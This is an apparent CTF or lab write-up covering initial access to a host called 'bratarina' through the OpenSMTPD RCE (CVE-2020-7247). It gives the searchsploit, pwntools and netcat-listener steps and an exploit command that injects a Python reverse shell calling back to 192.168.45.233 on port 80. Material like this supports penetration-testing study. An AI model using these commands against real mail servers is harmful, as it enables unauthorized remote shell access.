SMTP [Initial Access]

On seatching google with version shown, I came to know about below exploit. Although version is not matching but there is possiblity that this vulnerabilty exist in old explit.

OpenSMTPD 2.0.0 exploit

OpenSMTPD 6.6.1 - Remote Code ExecutionExploit Database

searchsploit -m 47984

perl 4169.py http://$bratarina id

RUnned this but not getting anything.

So, I graped CVE from exploit and searched on github.

I found below script.

https://raw.githubusercontent.com/SimonSchoeni/CVE-2020-7247-POC/refs/heads/main/exploit.py

this need pwn tool. So, install it in virtual environment.

pip install pwntools

Start the listener on port 80 (as port 80 is open)

nc -lnvp 80

Run the exploit wiht python reverse shell code.

python3 exploit.py --targetHost $bratarina --targetPort 25 --customCommand 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.45.233\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")"'

Got the shell.

Previoussmb Nextproof.txt

Last updated 1 year ago

Was this helpful?